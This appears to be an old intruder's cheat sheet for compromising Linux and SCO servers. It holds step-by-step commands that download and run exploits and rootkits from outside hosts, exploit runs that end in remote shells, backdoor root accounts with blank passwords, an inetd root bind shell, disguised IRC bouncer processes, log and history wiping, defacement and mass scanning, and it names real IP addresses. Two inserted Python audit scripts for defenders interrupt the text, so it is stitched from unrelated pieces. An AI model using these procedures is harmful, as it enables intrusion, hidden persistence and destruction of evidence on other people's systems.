: PSYBNC SETUP TRICK :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ; cd var/tmp/ ; mkdir .... ; cd .... ;
wget http://www.geocities.com/lifron/Pre-psyBNC.tgz; mv Pre-psyBNC.tgz .sh ; tar -zxvf .sh ; rm .sh ;
mv psybnc .log ; cd .log ; make; mv psybnc "bash " ; rm psybnc.conf ;
wget http://www.geocities.com/lifron/psybnc.conf.20075.txt ; mv psybnc.conf.20075.txt psybnc.txt ; mv psybnc.txt " " ; pwd ;
PATH=$PATH:/var/tmp/..../.log/ ; "bash " " "
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud ; find |grep psybnc
=================================================================================================
: LOG DELETION TRICK :
=================================================================================================
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
rm -f /.bash_history /root/.bash_history /var/tmp/messages
ln -s /dev/null /.bash_history
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
=================================================================================================
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ;
touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ;
rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
=================================================================================================
: LOCAL ROOT MANDRAKE :
=================================================================================================
unset HISTFILE ;
unset HISTSIZE ; export HISTFILESIZE=0 ; cd /tmp ; mkdir " " ; cd " "
1. wget www.geocities.com/lifron/local.tar.gz
2. tar -zxvf local.tar.gz
3. cd local
4. ./lconfex -p
5. ./lconfex -f
6. ./handy.sh 0xbffff625 0xbffff5f1
7. mkdir segfault.eng ; touch segfault.eng/segfault.eng
8. ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
9. id
10. root
11. /usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /home/.kuntua
12. echo "tondano::0:0::/.tondano:/bin/bash" >> /etc/passwd
    passwd -d kuntua
    Changing password for user kuntua
    Removing password for user kuntua
    passwd: Success
13. Log in to the shell, then clean the logs and install the backdoor
14. last |grep kuntua
15. su tondano
16. wget http//www.geocities.com/lifron/remove.c
17. gcc -o r remove.c -DGENERIC
18. ./remove /home/kuntus
19. wget www.geocities.com/lifron/shv4.tar.gz
20. tar -zxvf shv4.tar.gz
21. cd shv4
22. ./setup pass port, e.g. ./setup kuntua75 7788
23. /usr/sbin/userdel -r kuntua
24. cd /var/tmp/" " <== clean up all the tools
25. Test the shell on port 7788, login as : root, password : kuntua75
=================================================================================================
find index.html
whereis index.html
locate index.html
default :
cd /var/www/html
echo "KuNTuA ToNDaNo Was Here" > index.html
=================================================================================================
cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo "KuNTuA ToNDaNo Was Here" > mnc.html
to test it: http://IP-yg-kamu-hack/~apache
=================================================================================================
MAKE A BACKDOOR
=================================================================================================
echo "kuntua 1979/tcp" >> /etc/services
echo "dial stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf
kill -HUP 135
telnet to port "1979"
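The account and service changes in the sections above leave very distinctive traces: a second UID-0 entry appended to /etc/passwd, an empty password field (what `passwd -d` produces, and what the page's `echo "tondano::0:0::..."` line writes straight into /etc/passwd), hidden home directories such as /home/.kuntua, and an inetd.conf line that serves `/bin/sh -i` as root on a freshly registered port. The following is an added example for defenders and is not code from the original page: a small Python audit over /etc/passwd-style and inetd.conf-style text. The sample lines are constructed from the commands shown on this page, and the function names and the `known_root` whitelist are this example's own.

```python
"""Audit passwd and inetd.conf text for the account/service backdoors
described on this page. Added example; the sample data below is
constructed from the page's own commands, not captured from a host."""
import os

# Constructed sample /etc/passwd: line 3 uses a hidden home directory,
# line 4 is the page's echo "tondano::0:0::/.tondano:/bin/bash" >> /etc/passwd
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
apache:x:48:48:Apache:/var/www:/sbin/nologin
kuntua:x:501:10::/home/.kuntua:/bin/bash
tondano::0:0::/.tondano:/bin/bash
"""

# Constructed sample /etc/inetd.conf: the last line is the page's
# echo "dial stream tcp nowait root /bin/sh sh -i" >> /etc/inetd.conf
SAMPLE_INETD = """\
# <service> <socket> <proto> <flags> <user> <server> <args>
ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp  nowait  root  /usr/sbin/tcpd  in.telnetd
dial    stream  tcp  nowait  root  /bin/sh         sh -i
"""

SHELLS = {"sh", "bash", "ksh", "csh", "tcsh", "zsh", "dash"}


def audit_passwd(text, known_root=("root",)):
    """Return (line_no, finding, account) tuples for suspicious passwd entries."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            findings.append((n, "malformed", line))
            continue
        name, pw, uid, _gid, _gecos, home, _shell = fields
        if uid == "0" and name not in known_root:
            findings.append((n, "extra-uid0", name))      # a second superuser
        if pw == "":
            findings.append((n, "empty-password", name))  # passwd -d / blank field
        base = os.path.basename(home.rstrip("/"))
        if base.startswith(".") or home.startswith("/etc/"):
            findings.append((n, "hidden-home", name))     # /home/.x, /.x, /etc/.x
    return findings


def audit_inetd(text):
    """Return (line_no, finding, service) for inetd entries that hand out a shell."""
    findings = []
    for n, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:
            findings.append((n, "malformed", line))
            continue
        service, _sock, _proto, _wait, _user, server = fields[:6]
        args = fields[6:]
        # A shell binary as the server, or an interactive "-i" flag, is a bind shell
        if os.path.basename(server) in SHELLS or "-i" in args:
            findings.append((n, "shell-service", service))
    return findings


if __name__ == "__main__":
    for hit in audit_passwd(SAMPLE_PASSWD):
        print("passwd:", hit)
    for hit in audit_inetd(SAMPLE_INETD):
        print("inetd: ", hit)
```

Run on a real host with `audit_passwd(open("/etc/passwd").read())`; on a shadowed system also check /etc/shadow for an empty second field, since `passwd -d` blanks the hash there rather than in /etc/passwd.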
=================================================================================================
http://www.rocketpunch-ent.com/masslpd.tar
http://www.rocketpunch-ent.com/bindscan.c
http://www.rocketpunch-ent.com/lucstatdx.c
=================================================================================================
[root@gila /]# rpm -qa | grep samba
samba-client-2.0.7-36
samba-2.0.7-36
samba-common-2.0.7-36
[root@gila /]# arp -n
Address        HWtype  HWaddress           Flags Mask   Iface
192.168.0.6    ether   00:08:C7:C2:0F:1B   C            eth1
192.168.0.4    ether   00:80:5F:0E:B7:28   C            eth1
192.168.0.5    ether   00:00:B4:3C:AC:41   C            eth1
192.168.0.2    ether   00:C0:4F:94:CC:70   C            eth1
192.168.0.3    ether   00:10:5A:71:17:E3   C            eth1
192.168.0.1    ether   00:00:21:28:8C:47   C            eth1
[root@gila /]# nmblookup -d2 '*'    # to detect netbios
Got a positive name query response from 192.168.0.2 ( 192.168.0.2 )
Got a positive name query response from 192.168.0.4 ( 192.168.0.4 )
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Got a positive name query response from 192.168.0.3 ( 192.168.0.3 )
Got a positive name query response from 192.168.0.1 ( 192.168.0.1 )
[root@gila /]# locate findsmb
/usr/bin/findsmb
[root@router /]# findsmb
IP ADDR         NETBIOS NAME     WORKGROUP/OS/VERSION
-----------------------------------------
192.168.0.1     CYBER1           [CYBER]
192.168.0.2     CYBER2           [CYBER]
192.168.0.3     CYBER3           [CYBER]
192.168.0.4     CYBER4           [CYBER]
192.168.0.5     CYBER5           [CYBER]
[root@gila /]# mkdir /mnt/samba
[root@gila /]# smbclient -L CYBER5
Got a positive name query response from 192.168.0.5 ( 192.168.0.5 )
Password:
        Sharename      Type      Comment
        ---------      ----      -------
        A              Disk
        C              Disk
        D              Disk
        E              Disk
        IPC$           IPC       Remote Inter Process Communication
[root@gila /]# smbmount //cyber5/d /mnt/samba/
Password:
[root@gila /]#
[root@gila /]# cd /mnt/samba/
[root@router samba]# ls
ffastun.ffa  ffastun.ffo  install  RECYCLED  ffastun0.ffx  ffastun.ffl  film  win98
[root@gila samba]# cd film/
[root@gila film]# ls
Amy_Lindsay_Forbidden_Sins_01[1].mpeg
=================================================================================================
bash# tar -zxvf grabbb-0.1.0.tar.gz
bash# cd grabbb
bash# gcc -o grabbb grabbb.c
bash# ./grabbb -a 210.10.19.1 -b 210.100.50.1 23
=================================================================================================
gcc sco-pop.c -o sco-pop
./sco-pop www.target.com /var/adm
=================================================================================================
: CLEAN THE LOGS :
=================================================================================================
ctlog    -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/ctlog
messages -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/messages
sulog    -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/sulog
syslog   -> /var/opt/K/SCO/Unix/5.0.4Eb/usr/adm/syslog
utmp     -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmp
utmpx    -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/utmpx
wtmp     -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmp
wtmpx    -> /var/opt/K/SCO/Unix/5.0.4Eb/etc/wtmpx
=================================================================================================
securityfocus.com|rstcorp.com/its4|striker.ottawa.on.ca/~aland/pscan|securiteam.com|www.l0pht.com|insecure.org|rhino9.ml.org|technotronic.com|nmrc.org|cultdeadcow.com|kevinmitnick.com|2600.com|antionline.com|rootshell.com|aol.com|happyhacker.org|lwn.net|slashdot.org|netric.org
=================================================================================================
repsec.com|iss.net|checkpoint.com|infowar.com|
=================================================================================================
li.org|redhat.com|debian.org|linux.org|www.sgi.com|netbsd.org|openbsd.org|linuxtoday.com|freebsd.org|slackware.com|mandrake.com|linuxguruz.org
=================================================================================================
harvard.edu|yale.edu|caltech.edu|stanford.edu|mit.edu|berkeley.edu|oxford.edu|whitehouse.gov|sunsite.unc.edu|
=================================================================================================
http://channels.dal.net/netgate/psybnc2.3.tar.gz|geocities.com/logic_roncep|irc.netsplit.de/networks/DALnet/current.var|psychoid.lam3rz.de/psyBNC2.3.tar.gz|shellcentral.com/downloads/files/psyBNC2.3.1.tar.gz|seputarmalang.com/kayutangan.php|community.core-sdi.com/~juliano|packetstormsecurity.org/0212-exploits/telnetjuarez.c|packetstormsecurity.nl/0209-exploits/openssl-too-open.tar.gz|maskedteam.com/exploit/local.tar.gz|http://ftp.linux.hr/pub/openssh/openssh-2.1.1p4.tar.gz|wget http://www.pupet.net/fiona/sslpupet.tar.gz|
=================================================================================================
1. wget www.geocities.com/lifron/openssl.tar.gz
2. tar -zxvf openssl.tar.gz
3. ./ssl IP
   ./ssl 204.145.119.253
=================================================================================================
1. wget www.geocities.com/lifron/massapache.tar.gz
2. tar -zxvf massapache.tar.gz
3. cd massapache
4. ./massossl 211 443 10
=================================================================================================
1. wget http://www.geocities.com/lifron/openssl-too-open.tar.gz
2. tar -zxvf openssl-too-open.tar.gz
3. cd openssl-too-open
4. ./openssl-too-open
   ./openssl-too-open -a 0x15 -v 212.70.224.129
=================================================================================================
1. wget www.geocities.com/lifron/shv4.tar.gz
2. tar xzf shv4.tar.gz
3. cd shv4
4. ./setup port passwd
   ./setup 7788 35b4tu
=================================================================================================
1. wget http://www.geocities.com/lifron/massplor.tar.gz
2. tar -zxvf massplor.tar.gz
3. cd massplo
4. ./massplo IP -d 8
   ./massplo 210.10 -d 8
=================================================================================================
1. wget www.geocities.com/lifron/mapache2x.gz
2. tar -zxvf mapache2x.gz
3. cd slamet
4.
./apache 208.134.131.49
   ./massossl 80 443 13
   ./mapache 443 210.10
=================================================================================================
1. wget http://phaty.org/ptrace-kmod.c.txt
2. mv ptrace-kmod.c.txt ptrace-kmod.c
3. gcc -o ptrace-kmod ptrace-kmod.c
4. ./ptrace-kmod
=================================================================================================
1. wget http://netric.org/exploit/sambal.c
2. gcc -o sambal sambal.c
3. ./sambal -d 0 -C 60 -S IP <== scanning
   ./sambal -d 0 -C 60 -S IP | grep samba
   ./sambal -b 0 -v IP <=== attack
=================================================================================================
SecureCRT:   http://www.vandyke.com/
TTSSH:       http://www.zip.com.au/~roca/ttssh.html
PuTTY:       http://www.chiark.greenend.org.uk/~sgtatham/putty.html
SecureShell: http://public.srce.hr/~cigaly/ssh/
=================================================================================================
DEFACE
=================================================================================================
find index.html
whereis index.html
locate index.html
default :
cd /var/www/html
echo "KuNTuA Was Here" > index.html
=================================================================================================
cd /home
mkdir apache
cd apache
mkdir public_html
chmod 705 public_html
cd public_html
mv index.html mnc.html
echo "KuNTuA Was Here" > mnc.html
to test it: http://IP-yg-kamu-hack/~apache
=================================================================================================
Install WGET
=================================================================================================
1. try typing: cat /etc/issue, to see the operating system
2. type: ftp ftp.rpmfind.net
3. login : anonymous
4. cd linux/redhat/updates/7.0/en/os/
5. cd i386
6. get wget-1.8.2-4.70.i386.rpm
7. quit ftp
8.
Installation process:
   rpm -ivh wget-1.8.2-4.70.i386.rpm
   http://www.rpmfind.net/linux/rpm2html/search.php?query=wget&submit=Search+...&system=redhat&arch=
=================================================================================================
wget http://202.158.16.157/ssh.diff
wget http://www.geocities.com/lifron/openssh-3.4p1.tar.gz
tar -zxvf openssh-3.5p1.tar.gz
cp ssh.diff openssh-3.5p1.tar.gz
cd openssh-3.5p1
patch -p < ssh.diff
./configure
make ssh
./ssh -l root
./ssh -l root 66.136.37.101
./ssh -l root 66.149.178.214
=================================================================================================
: ADDUSER COMMAND :
=================================================================================================
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/kuntua
/usr/sbin/useradd tondano -u 0 -d /
passwd -d kuntua
Changing password for user kuntua
Removing password for user kuntua
passwd: Success
passwd -d tondano
Changing password for user tondano
Removing password for user tondano
passwd: Success
=================================================================================================
passwd kuntua
New UNIX password: kuntua75
Retype new UNIX password: kuntua75
Changing password for user kuntua
passwd: all authentication tokens updated successfully
passwd tondano
New UNIX password: kuntua75
Retype new UNIX password: kuntua75
Changing password for user tondano
passwd: all authentication tokens updated successfully
=================================================================================================
=================================================================================================
OPENSSL-TOO-OPEN
=================================================================================================
./openssl -a 0x15 -v 61.220.53.91
: openssl-too-open : OpenSSL remote exploit by Solar Eclipse
: Opening 30 connections
  Establishing SSL connections
-> ssl_connect_host
-> ssl_connect_host
->
ssl_connect_host
-> ssl_connect_host
: Using the OpenSSL info leak to retrieve the addresses
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl0 : 0x80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl1 : 0x80e1638
-> send_client_hello
-> get_server_hello
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_finished
ssl2 : 0x80e1638
: Sending shellcode
-> send_client_hello
-> get_server_hello
ciphers: 0x80e1638 start_addr: 0x80e1578 SHELLCODE_OFS: 208
-> send_client_master_key
-> generate_session_keys
-> get_server_verify
-> send_client_finished
-> get_server_error
Execution of stage1 shellcode succeeded, sending stage2
Spawning shell...
bash: no job control in this shell
bash-2.05$
bash-2.05$ uname -a;id
bash-2.05$ Linux Mandrake release 8.0 (Traktopel) for i586
bash-2.05$ Linux proxy2.rayongwit.net 2.4.3-20mdk #1 Sun Apr 15 23:03:10 CEST 2001 i686 unknown
bash-2.05$ uid=48(apache) gid=48(apache) groups=48(apache)
=================================================================================================
: NOW LET'S PLAY WITH ROOT :
=================================================================================================
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0
cd /tmp ; mkdir ... ; cd ....
wget www.geocities.com/lifron/local.tar.gz
tar -zxvf local.tar.gz
cd local
./lconfex -p
./lconfex -f
./handy.sh 0xbffff625 0xbffff5f1
GOT IT! Your magic number is : 792
Now create a dir 'segfault.eng' and touch a file named 'segfault.eng' in it.
Then exec "./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792" to get rootshell
*hint* : try play with -b if not succeed. [ n = 0..4 ]
ie : ./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792 -b 1
Good Luck d0inks!
mkdir segfault.eng; touch segfault.eng/segfault.eng
./lconfex -s 0xbffff625 -m 0xbffff5f1 -r 792
id
uid=0(root) gid=48(apache) groups=48(apache)
=================================================================================================
/usr/sbin/useradd mails -g wheel -s /bin/bash -d /home/mails
echo "apache::0:0::/mails:/bin/bash" >> /etc/passwd
passwd -d mails
Changing password for user mails
Removing password for user mails
passwd: Success
log in to the shell
last |grep mails
su apache
mkdir /var/tmp/" "
cd /var/tmp/" "
wget http.phaty.org/remove.c.txt ; mv remove.c.txt remove.c
gcc -o r remove.c -DGENERIC
./remove /home/mails
wget www.radikal.org/backdoor.tar.gz
tar xzf backdoor.tar.gz
./setup 35b4tud1n91n 7788
/usr/sbin/userdel -r mails
/usr/sbin/userdel -r apache
cd /var/tmp/" " <== delete all the tools
test the shell on port 7788 with password 35b4tud1n91n
=================================================================================================
[Log Deletion Step I]
=================================================================================================
export HISTFILE=/dev/null ; export HISTSIZE=0; export HISTFILESIZE=0
=================================================================================================
[Log Deletion Step II]
=================================================================================================
rm -rf /var/log/wtmp ; rm -rf /var/log/lastlog ; rm -rf /var/log/secure ; rm -rf /var/log/xferlog ; rm -rf /var/log/messages ; rm -rf /var/run/utmp ;
touch /var/run/utmp ; touch /var/log/messages ; touch /var/log/wtmp ; touch /var/log/messages ; touch /var/log/xferlog ; touch /var/log/secure ; touch /var/log/lastlog ;
rm -rf /var/log/maillog ; touch /var/log/maillog ; rm -rf /root/.bash_history ; touch /root/.bash_history ; history -r
=================================================================================================
wget http://brutalside.host.sk/tools/term
chmod +x term
./term lonthe123
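The log-deletion recipes above (and the identical ones near the top of the page and in the "erase tracks" section further down) all leave the same fingerprint: every login and syslog file ends up empty and touched within the same second, `.bash_history` becomes a symlink to /dev/null, and the tools sit in a staging directory whose name is only dots or spaces (`mkdir ....`, `mkdir " "`) so it hides from a casual `ls`. The following is an added example for incident responders, not code from the original page: a Python audit that checks a filesystem root for those artifacts. It builds a clean tree and a tampered tree in a temporary directory so it can run offline; the paths it checks are the ones the page's commands touch, and the function names and thresholds are this example's own assumptions.

```python
"""Spot the log-wiping and tool-hiding artifacts described on this page
(rm/touch of wtmp, lastlog, secure, messages, ...; .bash_history linked
to /dev/null; staging dirs named "...." or " " under /tmp or /var/tmp).
Added example; the two filesystem trees are constructed in a temp dir
so the audit can run offline."""
import os
import tempfile
import time

LOG_FILES = [
    "var/log/wtmp", "var/log/lastlog", "var/log/secure", "var/log/messages",
    "var/log/maillog", "var/log/xferlog", "var/run/utmp", "var/spool/mail/root",
]
HISTORY_FILES = ["root/.bash_history", ".bash_history"]
STAGING_DIRS = ["tmp", "var/tmp"]


def audit_host(root):
    """Return a list of (finding, path) tuples for a filesystem rooted at `root`."""
    findings = []
    mtimes = []
    for rel in LOG_FILES:
        path = os.path.join(root, rel)
        if not os.path.lexists(path):
            findings.append(("log-missing", rel))
            continue
        st = os.lstat(path)
        # `echo > file` leaves one byte, `touch` leaves zero: both are truncation
        if st.st_size <= 1:
            findings.append(("log-truncated", rel))
        mtimes.append(st.st_mtime)
    # Logs grow and rotate independently; all of them modified within the same
    # few seconds is the signature of a bulk rm/touch pass (threshold assumed).
    if len(mtimes) >= 3 and max(mtimes) - min(mtimes) < 5:
        findings.append(("log-mtime-cluster", "%d files" % len(mtimes)))
    for rel in HISTORY_FILES:
        path = os.path.join(root, rel)
        if os.path.islink(path) and os.readlink(path) == "/dev/null":
            findings.append(("history-devnull", rel))
    for rel in STAGING_DIRS:
        dpath = os.path.join(root, rel)
        if not os.path.isdir(dpath):
            continue
        for name in sorted(os.listdir(dpath)):
            # names made only of dots and spaces hide from a casual `ls`
            if name.strip(". ") == "" and os.path.isdir(os.path.join(dpath, name)):
                findings.append(("hidden-dirname", os.path.join(rel, name)))
    return findings


def _write(root, rel, data, mtime=None):
    path = os.path.join(root, rel)
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(data)
    if mtime is not None:
        os.utime(path, (mtime, mtime))


def build_demo_trees():
    """Create a clean tree and a tampered tree; return (clean_root, tampered_root)."""
    base = tempfile.mkdtemp(prefix="logaudit-")
    clean = os.path.join(base, "clean")
    bad = os.path.join(base, "tampered")
    now = time.time()
    for i, rel in enumerate(LOG_FILES):
        # clean: non-empty logs last written at different times over the past day
        _write(clean, rel, b"x" * 512, mtime=now - 3600 * (i + 1))
        # tampered: the page's rm + touch / echo > leaves empty files, all touched together
        _write(bad, rel, b"\n" if rel.endswith("mail/root") else b"")
    _write(clean, "root/.bash_history", b"ls -l\n")
    os.makedirs(os.path.join(bad, "root"), exist_ok=True)
    os.symlink("/dev/null", os.path.join(bad, "root/.bash_history"))
    for rel in STAGING_DIRS:
        os.makedirs(os.path.join(clean, rel), exist_ok=True)
        os.makedirs(os.path.join(bad, rel), exist_ok=True)
    os.makedirs(os.path.join(bad, "var/tmp", "...."), exist_ok=True)  # page: mkdir .... ; cd ....
    os.makedirs(os.path.join(bad, "tmp", " "), exist_ok=True)        # page: mkdir " " ; cd " "
    return clean, bad


if __name__ == "__main__":
    clean_root, bad_root = build_demo_trees()
    print("clean:", audit_host(clean_root))
    for finding in audit_host(bad_root):
        print("tampered:", finding)
```

Against a live system call `audit_host("/")`; the size and mtime checks only see the local copies, so the real mitigation is shipping these logs off-host (remote syslog) before anyone with root can truncate them.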
=================================================================================================
wget http://brutalside.host.sk/tools/ftp.tgz
gunzip ftp.tgz
gzip ftp.tar
tar -zxvf ftp.tar.gz
cd ftp
./scan 163 22 10
./scan 163 22 10 163
=================================================================================================
scan ports with pscan.c ==> www.packetstormsecurity.nl
if port 23 is vulnerable you can run the exploit:
wget http://phaty.org/7350854_c.txt
mv 7350854_c.txt 7350854.c
gcc -o 7350854 7350854.c
./7350854 IP
./7350854 216.89.24.213
=================================================================================================
http://brutalside.host.sk/tools/kik
chmod +x kik
./kik "-bash" ./psybnc
=================================================================================================
=================================================================================================
find / -name wtmp -print
find / -name utmp -print
find / -name lastlog -print
whereis wtmp
whereis utmp
whereis lastlog
===================
/usr/sbin/useradd -d /home/apache -s /bin/ksh apache
passwd apache
Then connect to the shell as a regular user, cd /tmp and:
wget www.norifumiya.org/r.c
gcc -o sh r.c
rm -rf r.v
rm -rf r.c
chown 0:0 /tmp/sh
chmod 777 sh
Up to here we are done with the root part of the game on the target server.
Now we go back to the regular user and type: ./sh
So, what happens after we run the command ./sh...?
What happens is that our uid and gid are now 0 :)
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
tar -zxvf psyBNC2.2.1-linux-i86-static.tar.gz
cd psybnc
echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
./psybnc psybnc.conf
=================================================================================================
wget www.psychoid.lam3rz.de/psyBNC2.2.1-linux-i86-static.tar.gz
mv psyBNC2.2.1-linux-i86-static.tar.gz .sh ; tar -zxvf .sh ; rm .sh ; mv psybnc .log ; cd .log
mv psybnc "syslogd "
echo "PSYBNC.SYSTEM.PORT1=60000" >> psybnc.conf
echo "PSYBNC.SYSTEM.HOST1=*" >> psybnc.conf
echo "PSYBNC.HOSTALLOWS.ENTRY0=*;*" >> psybnc.conf
mv psybnc.conf " " ; pwd
PATH=$PATH:/var/tmp/" "/.log/
"syslogd " " "
mv psybnc.pid .log ; mv ./psybncchk .sh ; mv ./log/psybnc.log .mud
=================================================================================================
+Command Mapache2x
- ./mapache RangeIP (e.g.: ./mapache 200 443 10 10) << Scan
- ./apache IPTarget (e.g.: ./apache 202.159.67.176)
==================================
+Command MassApache
- ./massossl RangeIP (e.g.: ./massossl 200 443 10 10) << Scan
- ./osslx -a 0x0b -v IPTarget (e.g.: ./osslx -a 0x0b -v 202.159.67.176)
================================================
+FTP Command 4 RooT
- ./scan <first octet of target IP> (e.g.: ./scan 210 21 10)
=addUser=
uid=0(root) gid=0(root) groups=50(ftp)
Linux root.ivines.co.kr 2.4.2-2 #1 Sun Apr 8 20:41:30 EDT 2001 i686 unknow
adduser?
Type /usr/sbin/adduser kuntua -g wheel -s /bin/bash -d /home/kuntua and press enter.
To set a password, type passwd kuntua and press enter, then type tondano and press enter, then type tondano again.
Note: typing tondano twice is what sets our password.
Changing password for user ganjen
passwd: all authentication tokens updated successfully
That means we now have a user on that shell, so just log in; don't forget to note down the IP.
If you want root access, type:
/usr/sbin/useradd bash -u 0 -d /
then type:
passwd -d bash
Erase tracks:
cd /
rm -f /.bash_history /root/.bash_history /var/log/messages
ln -s /dev/null /root/.bash_history
touch /var/log/messages
chmod 600 /var/log/messages
rm -rf /var/log/lastlog
cat > /var/log/lastlog
Typed it all? Done... press ctrl d.
=================================
+Backdoor NEWCOMER FREZZ BackDooR
- wget manadocarding.info/charles; chmod 755 charles; ./charles
= wget http://www.geocities.com/lifron/root; chmod 755 root; ./root
- wget http://www.geocities.com/cak_mus/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua 7000
= wget http://www.geocities.com/lifron/shv4.tar.gz; tar -zxvf shv4.tar.gz; cd shv4; ./setup kuntua75 7000
***** ADD USER SHELL *****
/usr/sbin/useradd yrfon -g wheel -s /bin/bash -d /etc/.yrfon
passwd -d yrfon
----------------- Patch Your Root -----------------
wget http://www.geocities.com/lifron/patch.tar.gz
tar -zxvf patch.tar.gz
cd patch
./sexy
CLEAN TRACKS: manual
echo >/var/spool/mail/root
echo >/var/run/utmp
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/messages
echo >/var/log/secure
echo >/var/log/maillog
echo >/var/log/xferlog
==================================
LOCAL ROOT
http://www.geocities.com/lifron/local.tar.gz
2.wget http://kelik-pelipur-lara.org/tools/local.tar.gz
cd local
chmod 755 *
./local.sh
./lconfex -p
./lconfex -f
sh ./handy.sh 0xbffffb24 0xbffff661
-------------------
Add user as root:
-------------------
1.
/usr/sbin/useradd kuntua -g wheel -s /bin/bash -d /etc/.kuntua
passwd -d kuntua
/usr/sbin/useradd moes -g wheel -s /bin/bash -d /etc/.moes
passwd -d moes
/usr/sbin/useradd cakmoes -g wheel -s /bin/bash -d /etc/.cakmoes
passwd -d cakmoes
2.
/usr/sbin/adduser jabriks -g root -d /var/jabriks
passwd -d jabriks
/usr/sbin/adduser mus -g root -d /var/mus
passwd -d mus
/usr/sbin/useradd tondano -g wheel -s /bin/bash -d /home/.tondano
passwd tondano75
----------------------------
**add user with root access
----------------------------
/usr/sbin/useradd bash -g root -u 0 -d /
passwd -d tondano
/usr/sbin/useradd jabrik -g root -u 0 -d /
passwd -d jabrik
/usr/sbin/useradd cakmoes -g root -u 0 -d /
passwd -d cakmoes
-----------
Del User
-----------
/usr/sbin/userdel -r [username]
IMPORTANT: once you have ROOT, type id and uname -a, then type cd /tmp
-----------------
---------------------------------------------
Rooting Linux via ssh, port 22:
wget http://packetstormsecurity.org/groups/teso/grabbb-0.1.0.tar.gz
tar -zxvf grabbb-0.1.0.tar.gz.tar.gz
gcc -o grabbb grabbb.c
cd grabbb
./grabbb -a IP -b IP port
e.g.: ./grabbb -a 202.1.1.1 -b 202.1.1.1 22
66.201.243.210
---------------------------------------------
wget www.suckmyass.org/ssh-scan8.tar.gz
tar
cd ssh-scan8
./r00t 203.20 -d 4 <--- mass SSH scan
./r00t 203.20 -d 2 <--- mass FTP scan
./r00t 203.20 -d 3 <--- mass FTP scan
./r00t 134.7. -d 4
---------------------------------------------
Rooting SCO OS:
wget www.renjana.com/sco
./sco IP
---------------------------------------------
Install a backdoor:
1.
id
uname -a
cd /tmp
wget http://packetstormsecurity.org/UNIX/penetration/rootkits/tk.tgz
ls -al
tar -zxvf tk.tgz
cd tk
./t0rn kuntua 7000
---------------------------------------------
LINKS:
http://www.eviltime.com/download/exploit
www.cahcepu.net
www.vibrasi.net
www.paktani.tk
www.sisilainrevolt.org
www.sitiung.com
www.utay-doyan.cc
www.atstake.com/research/redirect.html?users/10pht/nc110.tgz
=======
Usage: ./sambal [-bBcCdfprsStv] [host]
-b bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2)
-B bruteforce steps (default = 300)
-c connectback ip address
-C max childs for scan/bruteforce mode (default = 40)
-d bruteforce/scanmode delay in micro seconds (default = 100000)
-f force
-p port to attack (default = 139)
-r return address
-s scan mode (random)
-S scan mode
-t presets (0 for a list)
-v verbose mode
EXAMPLE:
[esdee@embrace esdee]$ ./sambal -d 0 -C 60 -S 192.168.0
samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be)
--------------------------------------------------------------
+ Scan mode.
+ [192.168.0.3] Samba
+ [192.168.0.10] Windows
+ [192.168.0.35] Windows
+ [192.168.0.36] Windows
+ [192.168.0.37] Windows
...
+ [192.168.0.133] Samba
./sambal -b 0 -v
===========
Usage: ./mayday-linux -t [-pa]
-t target    The host to attack.
-a password  Default password is "changeme".
-p port      Default port is 80001.
================
/usr/sbin/adduser httpd
passwd httpd
============
PATCH SAMBA
= [root@redeye samba]# /etc/init.d/smb stop
= Shutting down SMB services: [ OK ]
= Shutting down NMB services: [ OK ]
= [root@redeye root]# cd /etc/samba
